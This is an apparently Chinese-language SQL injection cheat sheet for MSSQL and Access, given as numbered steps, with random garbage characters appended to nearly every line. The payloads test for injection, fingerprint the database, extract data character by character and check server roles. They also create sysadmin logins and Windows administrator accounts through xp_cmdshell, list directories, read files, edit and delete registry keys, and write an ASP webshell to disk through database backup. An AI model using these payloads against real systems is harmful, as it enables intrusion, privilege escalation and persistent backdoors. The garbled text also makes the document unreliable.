1.判断是否有注入;and 1=1 ;and 1=2 ��!'!\�>x$
2.初步判断是否是mssql ;and user>0 �c)Ng9p��
pz��t<[��;
3.注入参数是字符'and [查询条件] and ''=' �Tc�v/EST
�]Ky`AG`2~
4.搜索时没过滤参数的'and [查询条件] and '%25'=' |L89yjhWBs
Qn��$Y�I9t
5.判断数据库系统 t�"9�r`0>�
e{5�O>R�O
;and (select count(*) from sysobjects)>0 mssql z�k1]����?
8 �# �B�R\
;and (select count(*) from msysobjects)>0 access #'@@P6�o5�
���m�b��`h
vH}�Vi�e�U
cxQ %tL+S&
6.猜数据库 ;and (select Count(*) from [数据库名])>0 8B+C[Q:+'�
OI0@lSAo<
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 a�j�G�_��t
Za�?�BpV~
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 e34g=]"���
Udc��V<#��
9.(1)猜字段的ascii值(access) �b7+�(g�[O
�1}Guhayy�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 )l(�D�tU!E
@�:Ft+*�2�
(2)猜字段的ascii值(mssql) U:@tdH+�A7
�nxEC6Vh'�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 j"E�w�)�6j
`�c��^�">L
10.测试权限结构(mssql) �6*�EIhIQ(
=/�xx�:D/
,�c`Wmp^AY
�4�Q1R:R�a
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- }Q9+krr�ow
Jq"�3xj���
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �R��xr?�T-
O�`�!X�W8�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 3&�"uf9d��
,y-��!h@(
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- f�`r�I]v|@
f6\4��,(�)
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 4M0�p:Ey '
��;*�+H&�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- OaT��]2�o
*aFh*-Sj2I
;and 1=(select IS_MEMBER('db_owner'));-- B�hjD��yB�
SY:I�Sz�B}
`��PeC,b�p
\QG�2��V$
11.添加mssql和系统的帐户 wi%l��s8�F
'~��7�zeZ'
;exec master.dbo.sp_addlogin username;-- ���W�w��r�
;exec master.dbo.sp_password null,username,password;-- ��L?M
x"
y,�OG9iD:h
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- CbxWK#aMmB
��u(hJyo�}
;exec master.dbo.xp_cmdshell 'net user username password {,(iL8�,^�
e_l|3��2#/
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- De{Z�Q��g)
��2qV�oe}F
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �f)Y~F/[$P
zN�))��.a
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- #�Jp|Cb<qx
C CLc,r�>)
Jr���X. f
%2B1E( r%M
12.(1)遍历目录 !&�.-{ _$
=\MA�z[IDj
;create table dirs(paths varchar(100), id int) '.g�i@�Sr5
$X�u/P5���
;insert dirs exec master.dbo.xp_dirtree 'c:\' +�7��AH|v8
e�J ^I+?h�
;and (select top 1 paths from dirs)>0 cF� EO��}
Xx2�t0A�IB
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) MZWv#;.�]�
'qG-�)2
t
2}*��8( 32
\L}7.�fkb8
(2)遍历目录 ;�n|%W�,b-
5}! 36�SO\
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �"(�d�I�/}
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �2 J3�/Eu�
�yh�|+U�sa
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �H;q[$EUNb
tJ8:S�@E3,
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 b�5�KK0Jjk
@[f$�MRp�\
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Lp�4F1H2t-
�,Jn` qvmi
I�Gly�x'\_
Tdz�#,]Q �
13.mssql中的存储过程 o�Q*L��P{M
?|
6s�Tu�!
xp_regenumvalues 注册表根键, 子键 V�e�Y&pPQ�
(#�)XRm{�t
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 %"�"h:1�/S
t�Tub��W=H
xp_regread 根键,子键,键值名 ^-|~c�`&}B
��ma�<uXq�
;exec xp_regread m~P���30)�
]ZW-`U��MO
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 c�^p���uz2
-XK;B�--�c
xp_regwrite 根键,子键, 值名, 值类型, 值 D:z_�F�NN�
T{-gbo`Yji
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Ul�NV�%34"
TiG?�r$6v%
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ?2\o��i�*$
a��'n17�d&
xp_regdeletevalue 根键,子键,值名 hn/yX|4c(�
xdz 6[8�d8
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �JL{fW>5y|
guf�*>qNr
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 M&gi$�Qs[E
KK6�z3"tk5
�,�`k6�@�4
�kUT^���o�
14.mssql的backup创建webshell 'iO�a��j0f
0w<�� i�lJ
use model 6X?:mn'%QF
�;O{bF�8�U
create table cmd(str image); {cO8q
}L
=YfzB��!ld
insert into cmd(str) values (''); yJ �ljCu)f
�rw�io>4=�
backup database model to disk='c:\l.asp'; q�@����;1{
`�����g�)
;cPPx�`0$9
W�,H=K##6<
15.mssql内置函数 �Qb55�q`'z
2mM�i=p�v9
;and (select @@version)>0 获得Windows的版本号 h�|����`R[
%X}vuE[[UC
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �l?�V��#;�
U /�~��uu�
;and (select user_name())>0 爆当前系统的连接用户 Dv�`�"�3��
k'Pv�Ql"�I
;and (select db_name())>0 得到当前连接的数据库 6BEp�nw>p(
eO�k�iB!G.
|!7l�e�L��
i�_l{#*t��
16.简洁的webshell �`�L[q`r�7
�I|>.&n��b
use model E�?bv<L,�"
C&%�NO;Ole
create table cmd(str image);
B�!8X?8�D
9V&�+xbR&�
insert into cmd(str) values (''); !<VP�[%2L~
yGrnz�B6�|
backup database model to disk='g:\wwwtest\l.asp';
